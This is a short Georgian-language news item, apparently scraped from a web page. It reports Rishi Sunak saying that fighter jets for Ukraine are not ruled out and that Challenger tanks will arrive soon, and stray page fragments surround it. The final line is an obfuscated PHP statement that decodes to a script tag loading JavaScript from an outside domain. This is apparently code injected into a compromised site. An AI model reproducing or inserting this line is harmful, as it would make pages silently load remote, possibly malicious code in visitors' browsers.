celsiusi
ავერსი საქკაბელი
გაერთიანებული სამეფო უკრაინისთვის ავიაგამანადგურებლების გადაცემის საკითხს არ გამორიცხავს. ამის შესახებ პრემიერ-მინისტრმა რიში სუნაკმა, ვოლოდიმირ ზელენსკისთან ერთობლივი პრესკონფერენციისას განაცხადა.
„როდესაც საუბარია ავიაგამანადგურებლებზე, რა თქმა უნდა, ისინი მოლაპარაკების ნაწილია. სწორედ ამიტომ გამოვაცხადეთ დღეს, რომ გავწვრთნით უკრაინის საჰაერო ძალებს ნატო-ს სტანდარტების პლატფორმებზე. თუმცა, ავიაგამანადგურებლების უკრაინისთვის გადაცემის საკითხი, მხოლოდ ბრიტანეთის გარდა მოკავშირეებზეც არის დამოკიდებული“,- განაცხადა რიში სუნაკმა.
ასევე პრემიერის თქმით, „ჩელენჯერის“ ტანკები, უკრაინაში უკვე რამდენიმე კვირაში ჩავა.
320
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");